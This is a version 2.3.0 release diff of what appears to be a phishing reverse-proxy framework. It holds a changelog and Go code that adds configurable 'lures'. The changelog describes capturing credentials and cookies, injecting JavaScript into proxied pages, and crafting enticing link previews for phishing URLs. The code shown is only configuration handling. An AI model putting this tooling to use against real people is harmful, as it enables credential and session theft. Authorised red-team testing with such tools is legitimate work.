2.3.0 released

CHANGELOG

@@ -0,0 +1,21 @@
+2.3.0
+- Proxy can now create most of required `sub_filters` on its own, making it much easier to create new phishlets.
+- Added lures, with which you can prepare custom phishing URLs with each having its own set of unique options (`help lures` for more info).
+- Added OpenGraph settings for lures, allowing to create enticing content for link previews.
+- Added ability to inject custom Javascript into proxied pages.
+- Injected Javascript can be customized with values of custom parameters, specified in lure options.
+- Deprecated `landing_path` and replaced it with `login` section, which contains the domain and path for website's login page.
+
+2.2.1
+- Fixed: `type` with value `json` was not correctly activated when set under `credentials`.
+
+2.2.0
+- Now when any of `auth_urls` is triggered, the redirection will take place AFTER response cookies for that request are captured.
+- Regular expression groups working with `sub_filters`.
+- Phishlets are now listed in a table.
+- Restructured phishlet YAML config file to be easier to understand (phishlets from previous versions need to be updated to new format).
+- Phishlet fields are now selectively lowercased and validated upon loading to prevent surprises.
+- All search fields in the phishlet are now regular expressions by default (remember about proper escaping!).
+- Added option to capture custom POST arguments additionally to credentials. Check `custom` field under `credentials`.
+- Added feature to inject custom POST arguments to requests. Useful when forcing users to tick that "Remember me" checkbox.
+- Removed 'name' variable from phishlets. Phishlet name is now determined solely based on the filename.

core/banner.go

@@ -8,7 +8,7 @@ import (
 )
 
 const (
-	VERSION = "2.2.2"
+	VERSION = "2.3.0"
 )
 
 func putAsciiArt(s string) {

core/config.go

@@ -11,6 +11,18 @@ import (
 	"github.com/spf13/viper"
 )
 
+type Lure struct {
+	Path          string            `mapstructure:"path" yaml:"path"`
+	RedirectUrl   string            `mapstructure:"redirect_url" yaml:"redirect_url"`
+	Phishlet      string            `mapstructure:"phishlet" yaml:"phishlet"`
+	Info          string            `mapstructure:"info" yaml:"info"`
+	OgTitle       string            `mapstructure:"og_title" yaml:"og_title"`
+	OgDescription string            `mapstructure:"og_desc" yaml:"og_desc"`
+	OgImageUrl    string            `mapstructure:"og_image" yaml:"og_image"`
+	OgUrl         string            `mapstructure:"og_url" yaml:"og_url"`
+	Params        map[string]string `mapstructure:"params" yaml:"params"`
+}
+
 type Config struct {
 	siteDomains       map[string]string
 	baseDomain        string
@@ -24,6 +36,7 @@ type Config struct {
 	verificationParam string
 	verificationToken string
 	redirectUrl       string
+	lures             []*Lure
 	cfg               *viper.Viper
 }
 
@@ -37,6 +50,7 @@ const (
 	CFG_VERIFICATION_PARAM = "verification_key"
 	CFG_VERIFICATION_TOKEN = "verification_token"
 	CFG_REDIRECT_URL       = "redirect_url"
+	CFG_LURES              = "lures"
 )
 
 const DEFAULT_REDIRECT_URL = "https://www.youtube.com/watch?v=dQw4w9WgXcQ" // Rick'roll
@@ -48,6 +62,7 @@ func NewConfig(cfg_dir string, path string) (*Config, error) {
 		sitesHidden:   make(map[string]bool),
 		phishlets:     make(map[string]*Phishlet),
 		phishletNames: []string{},
+		lures:         []*Lure{},
 	}
 
 	c.cfg = viper.New()
@@ -109,6 +124,8 @@ func NewConfig(cfg_dir string, path string) (*Config, error) {
 	if c.redirectUrl == "" {
 		c.SetRedirectUrl(DEFAULT_REDIRECT_URL)
 	}
+	c.lures = []*Lure{}
+	c.cfg.UnmarshalKey(CFG_LURES, &c.lures)
 
 	return c, nil
 }
@@ -308,6 +325,71 @@ func (c *Config) AddPhishlet(site string, pl *Phishlet) {
 	c.phishlets[site] = pl
 }
 
+func (c *Config) AddLure(site string, l *Lure) {
+	c.lures = append(c.lures, l)
+	c.cfg.Set(CFG_LURES, c.lures)
+	c.cfg.WriteConfig()
+}
+
+func (c *Config) SetLure(index int, l *Lure) error {
+	if index >= 0 && index < len(c.lures) {
+		c.lures[index] = l
+	} else {
+		return fmt.Errorf("index out of bounds: %d", index)
+	}
+	c.cfg.Set(CFG_LURES, c.lures)
+	c.cfg.WriteConfig()
+	return nil
+}
+
+func (c *Config) DeleteLure(index int) error {
+	if index >= 0 && index < len(c.lures) {
+		c.lures = append(c.lures[:index], c.lures[index+1:]...)
+	} else {
+		return fmt.Errorf("index out of bounds: %d", index)
+	}
+	c.cfg.Set(CFG_LURES, c.lures)
+	c.cfg.WriteConfig()
+	return nil
+}
+
+func (c *Config) DeleteLures(index []int) []int {
+	tlures := []*Lure{}
+	di := []int{}
+	for n, l := range c.lures {
+		if !intExists(n, index) {
+			tlures = append(tlures, l)
+		} else {
+			di = append(di, n)
+		}
+	}
+	if len(di) > 0 {
+		c.lures = tlures
+		c.cfg.Set(CFG_LURES, c.lures)
+		c.cfg.WriteConfig()
+	}
+	return di
+}
+
+func (c *Config) GetLure(index int) (*Lure, error) {
+	if index >= 0 && index < len(c.lures) {
+		return c.lures[index], nil
+	} else {
+		return nil, fmt.Errorf("index out of bounds: %d", index)
+	}
+}
+
+func (c *Config) GetLureByPath(site string, path string) (*Lure, error) {
+	for _, l := range c.lures {
+		if l.Phishlet == site {
+			if l.Path == path {
+				return l, nil
+			}
+		}
+	}
+	return nil, fmt.Errorf("lure for path '%s' not found", path)
+}
+
 func (c *Config) GetPhishlet(site string) (*Phishlet, error) {
 	pl, ok := c.phishlets[site]
 	if !ok {